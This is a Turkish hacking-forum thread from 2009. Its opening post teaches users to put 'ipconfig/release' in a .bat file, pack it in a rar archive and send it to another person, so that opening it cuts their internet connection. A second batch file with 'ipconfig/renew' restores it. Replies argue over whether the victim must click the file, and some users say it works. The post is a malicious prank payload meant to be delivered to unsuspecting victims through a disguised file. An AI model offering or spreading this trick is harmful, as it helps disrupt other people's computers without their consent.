beyler içeri!! Karşıdakinin internet bağlantısını kesme! (programsız)

_MayKi_

Katılımcı Üye
12 May 2009
415
0
arkadaslar cok basit bi yöntemle karsı tarafın internetini yok edecez asagıdaki adımları izleyin uygulayın..inanmayan kendisindede deniyebilir:D:D

bi metin belgesi olusturuyoruz uzantısını .bat olarak yani yeni isim vererek örn mayki.bat olarak yazıyoruz.daha sonra olusturdugumuz metin belgesine düzenle diyoruz ve icine kücük harflerle ''ipconfig/release'' yazıyoruz ve kaydediyoruz..sonra dosyayı rarlayıp karsı tarafa yolluyoruz pcsinde actıgı zaman neti bum:D:D:D

neti tekrar geri getirmek icin ise gene yeni bi metin belgesi olusturuyorz adınız hacked.bat yazıyoruz..tekrar dosyaya düzenle deyip su komutu yazıyoruz...''ipconfig/renew'' yazıyoruz.tekrar tıklayınca neti geri gelecktir.

Son düzenleme:

alemcix

Katılımcı Üye
23 Eyl 2007
591
10
şunu anlamadım karşıdaki rar dosyasını açmayıp bat uzantılı dosyaya tıklamadığı sürece nasıl neti gidicek dosya alımında rar otomatik oalrak açılıp batımı çalışıyo yani :) bence tıklamadığı sürece hiç bişey olmaz....ii günler...

DelPhoİ

Kıdemli Üye
14 Nis 2009
4,460
1
BuRsATexAs
şunu anlamadım karşıdaki rar dosyasını açmayıp bat uzantılı dosyaya tıklamadığı sürece nasıl neti gidicek dosya alımında rar otomatik oalrak açılıp batımı çalışıyo yani :) bence tıklamadığı sürece hiç bişey olmaz....ii günler...

katılıyorum sonucta o dosyanın işlev gormesı lazım

The Cry

Kıdemli Üye
19 Eki 2007
3,111
10
"-Her Yerden-"
Eğer Sen Zeki İsen Pm At Bana Msn Adresimi Veriyim Ekle Konuda Yazdıklarının Aynısını Yap Bağlantım Kesilsin Netim Olmasın Ama Sen Msnden Tekrar Yolla Bana O Kodu Qke ;) artık anlayan anladı

_MayKi_

Katılımcı Üye
12 May 2009
415
0
beyler özür dilerim karsı tarafa yolladıgın zaman o kisi pcsinde tıklaması lazım yoksa ise yaramaz yani ben böle düsüneceğinizi düsünmedim düzelttim saten tekrardan özür karsı tarafa yolluyoruz ve karsı taraf bunu acınca neti gidecektir..

katill-

Yeni üye
29 Nis 2009
26
0
valla kardes süpersin suanda ben denedim gercekten verdiğin kod calısıyor int gidiyo modeme ve pc ye reset attım genede gelmedi diğer komutla geri getirdim güzel paylasım.

primus06

Yeni üye
10 Ağu 2008
15
0
Mayki yine çoşturmussun kendimde denedim kardeş %1000 çalışıyor yani emeğine sağlık teşekkürler.. :d

Çiçero

Özel Üye
9 Eyl 2008
1,525
43
Türk Otağ
.bat UZANTILI KAYITLI DOSYALRI PC İŞ DOSYASI OLARAK ALDILAR VE BUNALRIN ÇALIŞMASI İÇİN BİR EXE. YADA EL İLE İŞLEME SOKULMASI GEREKMEKTEDİR ARKADAŞIN VERDİĞİ ÖRNEKTE KARŞI KİŞİNİN TIKLAMASI GEREKMEKTEDİR:)PAYLAŞIM İÇİN SAĞOL:)İŞE YARARMI BAKACAZ:)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.